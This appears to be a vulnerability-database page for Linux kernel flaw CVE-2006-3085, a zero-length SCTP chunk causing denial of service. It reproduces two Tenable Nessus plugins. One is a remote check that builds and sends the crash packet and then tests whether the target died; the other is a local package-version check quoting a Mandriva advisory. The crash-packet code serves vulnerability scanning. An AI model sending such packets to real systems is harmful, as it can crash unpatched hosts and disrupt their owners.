Vulnerabilities > CVE-2006-3085 - Remote Denial of Service vulnerability in Linux Kernel XT_SCTP-netfilter

047910
CVSS 7.8 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
COMPLETE
network
low complexity
linux
nessus
NVD
Published: 2006-06-23
Updated: 2018-10-18

Summary

xt_sctp in netfilter for Linux kernel before 2.6.17.1 allows attackers to cause a denial of service (infinite loop) via an SCTP chunk with a 0 length.

Vulnerable Configurations

Part Description Count
OS
Linux
148

Nessus

  • NASL familyDenial of Service
    NASL idLINUX_SCTP_CHUNK_HEADER_DOS.NASL
    descriptionThere is a flaw in the Linux kernel on the remote host that causes a kernel panic when it receives an SCTP packet with a chunk data packet of length 0. An attacker can leverage this flaw to crash the remote host. Additionally, other types of crafted packets can cause a remote denial of service in various SCTP related functions. Note that successful exploitation of this issue requires that the kernel support SCTP protocol connection tracking.
    last seen2020-06-01
    modified2020-06-02
    plugin id21333
    published2006-05-09
    reporterThis script is Copyright (C) 2006-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/21333
    titleLinux SCTP Functionality Multiple Remote DoS
    code
    #
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(21333);
  script_version("1.25");
  script_cvs_date("Date: 2018/07/14  1:59:35");

  script_cve_id("CVE-2006-1527", "CVE-2006-2934", "CVE-2006-3085");
  script_bugtraq_id(17806, 18550, 18755);

  script_name(english:"Linux SCTP Functionality Multiple Remote DoS");
  script_summary(english:"Sends an SCTP packet with a chunk header of length 0");

  script_set_attribute(attribute:"synopsis", value:
"It is possible to crash the remote host by sending it a malformed SCTP
packet.");
  script_set_attribute(attribute:"description", value:
"There is a flaw in the Linux kernel on the remote host that causes a
kernel panic when it receives an SCTP packet with a chunk data packet
of length 0. An attacker can leverage this flaw to crash the remote
host. Additionally, other types of crafted packets can cause a remote
denial of service in various SCTP related functions.

Note that successful exploitation of this issue requires that the
kernel support SCTP protocol connection tracking.");
  script_set_attribute(attribute:"see_also", value:"http://lists.netfilter.org/pipermail/netfilter-devel/2006-May/024241.html");
  script_set_attribute(attribute:"see_also", value:"http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.16.13");
  script_set_attribute(attribute:"see_also", value:"http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.17.1");
  script_set_attribute(attribute:"see_also", value:"http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.16.23");
  script_set_attribute(attribute:"see_also", value:"http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.17.3");
  script_set_attribute(attribute:"solution", value:"Upgrade to Linux kernel 2.6.16.23 / 2.6.17.3 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"vuln_publication_date", value:"2006/05/02");
  script_set_attribute(attribute:"plugin_publication_date", value:"2006/05/09");

  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:linux:kernel");
  script_end_attributes();

  script_category(ACT_KILL_HOST);
  script_family(english:"Denial of Service");

  script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");

  script_dependencies("os_fingerprint.nasl");
  script_require_keys("Settings/ParanoidReport");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("raw.inc");

os = get_kb_item("Host/OS");
if ( os && "Linux" >!< os ) exit(0);

if (report_paranoia < 2) audit(AUDIT_PARANOID);




if (islocalhost()) exit(0);
if (!get_host_open_port()) exit(0);
if ( TARGET_IS_IPV6 ) exit(0);


# Construct a malicious SCTP packet.
sctp =
  # SCTP header
  mkword(rand()) +                     # source port
  mkword(rand()) +                     # destination port
  mkdword(0) +                         # verification tag
  mkdword(0) +                         # checksum (to be added later)

  # SCTP chunk 1
  mkbyte(1) +                          # type (1 => INIT)
  mkbyte(0) +                          # flags
  mkbyte(0);                           # length (0 => boom!)
chksum = inet_sum(sctp);
ip = ip(ip_p:132);                     # SCTP
sctp = payload(insstr(sctp, mkdword(chksum), 8, 11));
boom = mkpacket(ip, sctp);


# Send packet and check whether the host is down.
start_denial();
send_packet(boom, pcap_active:FALSE);
alive = end_denial();
if (!alive)
{
  set_kb_item(name:"Host/dead", value:TRUE);
  security_hole(0);
}
  • NASL familyMandriva Local Security Checks
    NASL idMANDRAKE_MDKSA-2006-123.NASL
    descriptionA number of vulnerabilities were discovered and corrected in the Linux 2.6 kernel : The kernel did not clear sockaddr_in.sin_zero before returning IPv4 socket names for the getsockopt function, which could allow a local user to obtain portions of potentially sensitive memory if getsockopt() is called with SO_ORIGINAL_DST (CVE-2006-1343). Prior to 2.6.16, a buffer overflow in the USB Gadget RNDIS implementation could allow a remote attacker to cause a Denial of Service via a remote NDIS response (CVE-2006-1368). Prior to 2.6.13, local users could cause a Denial of Service (crash) via a dio transfer from the sg driver to memory mapped IO space (CVE-2006-1528). Prior to and including 2.6.16, the kernel did not add the appropriate LSM file_permission hooks to the readv and writev functions, which could allow an attacker to bypass intended access restrictions (CVE-2006-1856). Prior to 2.6.16.17, a buffer oveflow in SCTP could allow a remote attacker to cause a DoS (crash) and possibly execute arbitrary code via a malformed HB-ACK chunk (CVE-2006-1857). Prior to 2.6.16.17, SCTP could allow a remote attacker to cause a DoS (crash) and possibly execute arbitrary code via a chunk length that is inconsistent with the actual length of provided parameters (CVE-2006-1858). Prior to 2.6.16.16, a memory leak in fs/locks.c could allow an attacker to cause a DoS (memory consumption) via unspecified actions (CVE-2006-1859). Prior to 2.6.16.16, lease_init in fs/locks.c could allow an attacker to cause a DoS (fcntl_setlease lockup) via certain actions (CVE-2006-1860). Prior to 2.6.17, SCTP allowed remote attackers to cause a DoS (infinite recursion and crash) via a packet that contains two or more DATA fragments (CVE-2006-2274). Prior to 2.6.16.21, a race condition in run_posix_cpu timers could allow a local user to cause a DoS (BUG_ON crash) by causing one CPU to attach a timer to a process that is exiting (CVE-2006-2445). Prior to 2.6.17.1, xt_sctp in netfilter could allow an attacker to cause a DoS (infinite loop) via an SCTP chunk with a 0 length (CVE-2006-3085). As well, an issue where IPC could hit an unmapped vmalloc page when near the page boundary has been corrected. In addition to these security fixes, other fixes have been included such as : - avoid automatic update of kernel-source without updating the kernel - fix USB EHCI handoff code, which made some machines hang while booting - disable USB_BANDWIDTH which corrects a known problem in some USB sound devices - fix a bluetooth refcounting bug which could hang the machine - fix a NULL pointer dereference in USB-Serial
    last seen2020-06-01
    modified2020-06-02
    plugin id22058
    published2006-07-18
    reporterThis script is Copyright (C) 2006-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/22058
    titleMandrake Linux Security Advisory : kernel (MDKSA-2006:123)
    code
    #%NASL_MIN_LEVEL 80502

#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were  
# extracted from Mandrake Linux Security Advisory MDKSA-2006:123. 
# The text itself is copyright (C) Mandriva S.A.
#

if (NASL_LEVEL < 3000) exit(0);

include("compat.inc");

if (description)
{
  script_id(22058);
  script_version ("1.16");
  script_cvs_date("Date: 2019/08/02 13:32:48");

  script_cve_id("CVE-2006-1342", "CVE-2006-1343", "CVE-2006-1368", "CVE-2006-1528", "CVE-2006-1856", "CVE-2006-1857", "CVE-2006-1858", "CVE-2006-1859", "CVE-2006-1860", "CVE-2006-2274", "CVE-2006-2445", "CVE-2006-3085");
  script_xref(name:"MDKSA", value:"2006:123");

  script_name(english:"Mandrake Linux Security Advisory : kernel (MDKSA-2006:123)");
  script_summary(english:"Checks rpm output for the updated packages");

  script_set_attribute(
    attribute:"synopsis", 
    value:
"The remote Mandrake Linux host is missing one or more security
updates."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"A number of vulnerabilities were discovered and corrected in the Linux
2.6 kernel :

The kernel did not clear sockaddr_in.sin_zero before returning IPv4
socket names for the getsockopt function, which could allow a local
user to obtain portions of potentially sensitive memory if
getsockopt() is called with SO_ORIGINAL_DST (CVE-2006-1343).

Prior to 2.6.16, a buffer overflow in the USB Gadget RNDIS
implementation could allow a remote attacker to cause a Denial of
Service via a remote NDIS response (CVE-2006-1368).

Prior to 2.6.13, local users could cause a Denial of Service (crash)
via a dio transfer from the sg driver to memory mapped IO space
(CVE-2006-1528).

Prior to and including 2.6.16, the kernel did not add the appropriate
LSM file_permission hooks to the readv and writev functions, which
could allow an attacker to bypass intended access restrictions
(CVE-2006-1856).

Prior to 2.6.16.17, a buffer oveflow in SCTP could allow a remote
attacker to cause a DoS (crash) and possibly execute arbitrary code
via a malformed HB-ACK chunk (CVE-2006-1857).

Prior to 2.6.16.17, SCTP could allow a remote attacker to cause a DoS
(crash) and possibly execute arbitrary code via a chunk length that is
inconsistent with the actual length of provided parameters
(CVE-2006-1858).

Prior to 2.6.16.16, a memory leak in fs/locks.c could allow an
attacker to cause a DoS (memory consumption) via unspecified actions
(CVE-2006-1859).

Prior to 2.6.16.16, lease_init in fs/locks.c could allow an attacker
to cause a DoS (fcntl_setlease lockup) via certain actions
(CVE-2006-1860).

Prior to 2.6.17, SCTP allowed remote attackers to cause a DoS
(infinite recursion and crash) via a packet that contains two or more
DATA fragments (CVE-2006-2274).

Prior to 2.6.16.21, a race condition in run_posix_cpu timers could
allow a local user to cause a DoS (BUG_ON crash) by causing one CPU to
attach a timer to a process that is exiting (CVE-2006-2445).

Prior to 2.6.17.1, xt_sctp in netfilter could allow an attacker to
cause a DoS (infinite loop) via an SCTP chunk with a 0 length
(CVE-2006-3085).

As well, an issue where IPC could hit an unmapped vmalloc page when
near the page boundary has been corrected.

In addition to these security fixes, other fixes have been included
such as :

  - avoid automatic update of kernel-source without updating
    the kernel

    - fix USB EHCI handoff code, which made some machines
      hang while booting

  - disable USB_BANDWIDTH which corrects a known problem in
    some USB sound devices

  - fix a bluetooth refcounting bug which could hang the
    machine

    - fix a NULL pointer dereference in USB-Serial's
      serial_open() function

  - add missing wakeup in pl2303 TIOCMIWAIT handling

    - fix a possible user-after-free in USB-Serial core

    - suspend/resume fixes

    - HPET timer fixes

    - prevent fixed button event to reach userspace on S3
      resume

    - add sysfs support in ide-tape

    - fix ASUS P5S800 reboot

Finally, a new drbd-utils package is provided that is a required
upgrade with this new kernel due to a logic bug in the previously
shipped version of drbd-utils that could cause a kernel panic on the
master when a slave went offline.

The provided packages are patched to fix these vulnerabilities. All
users are encouraged to upgrade to these updated kernels.

To update your kernel, please follow the directions located at :

http://www.mandriva.com/en/security/kernelupdate"
  );
  script_set_attribute(attribute:"solution", value:"Update the affected packages.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_cwe_id(20, 119);

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:drbd-utils");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:drbd-utils-heartbeat");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:kernel-2.6.12.23mdk");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:kernel-BOOT-2.6.12.23mdk");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:kernel-i586-up-1GB-2.6.12.23mdk");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:kernel-i686-up-4GB-2.6.12.23mdk");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:kernel-smp-2.6.12.23mdk");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:kernel-source-2.6.12.23mdk");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:kernel-source-stripped-2.6.12.23mdk");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:kernel-xbox-2.6.12.23mdk");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:kernel-xen0-2.6.12.23mdk");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:kernel-xenU-2.6.12.23mdk");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2006");

  script_set_attribute(attribute:"patch_publication_date", value:"2006/07/13");
  script_set_attribute(attribute:"plugin_publication_date", value:"2006/07/18");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2006-2019 Tenable Network Security, Inc.");
  script_family(english:"Mandriva Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/Mandrake/release", "Host/Mandrake/rpm-list");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("rpm.inc");


if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Mandrake/release")) audit(AUDIT_OS_NOT, "Mandriva / Mandake Linux");
if (!get_kb_item("Host/Mandrake/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if (cpu !~ "^(amd64|i[3-6]86|x86_64)$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Mandriva / Mandrake Linux", cpu);


flag = 0;
if (rpm_check(release:"MDK2006.0", reference:"drbd-utils-0.7.19-2.1.20060mdk", yank:"mdk")) flag++;
if (rpm_check(release:"MDK2006.0", reference:"drbd-utils-heartbeat-0.7.19-2.1.20060mdk", yank:"mdk")) flag++;
if (rpm_check(release:"MDK2006.0", reference:"kernel-2.6.12.23mdk-1-1mdk", yank:"mdk")) flag++;
if (rpm_check(release:"MDK2006.0", reference:"kernel-BOOT-2.6.12.23mdk-1-1mdk", yank:"mdk")) flag++;
if (rpm_check(release:"MDK2006.0", cpu:"i386", reference:"kernel-i586-up-1GB-2.6.12.23mdk-1-1mdk", yank:"mdk")) flag++;
if (rpm_check(release:"MDK2006.0", cpu:"i386", reference:"kernel-i686-up-4GB-2.6.12.23mdk-1-1mdk", yank:"mdk")) flag++;
if (rpm_check(release:"MDK2006.0", reference:"kernel-smp-2.6.12.23mdk-1-1mdk", yank:"mdk")) flag++;
if (rpm_check(release:"MDK2006.0", reference:"kernel-source-2.6.12.23mdk-1-1mdk", yank:"mdk")) flag++;
if (rpm_check(release:"MDK2006.0", reference:"kernel-source-stripped-2.6.12.23mdk-1-1mdk", yank:"mdk")) flag++;
if (rpm_check(release:"MDK2006.0", cpu:"i386", reference:"kernel-xbox-2.6.12.23mdk-1-1mdk", yank:"mdk")) flag++;
if (rpm_check(release:"MDK2006.0", cpu:"i386", reference:"kernel-xen0-2.6.12.23mdk-1-1mdk", yank:"mdk")) flag++;
if (rpm_check(release:"MDK2006.0", cpu:"i386", reference:"kernel-xenU-2.6.12.23mdk-1-1mdk", yank:"mdk")) flag++;


if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");

References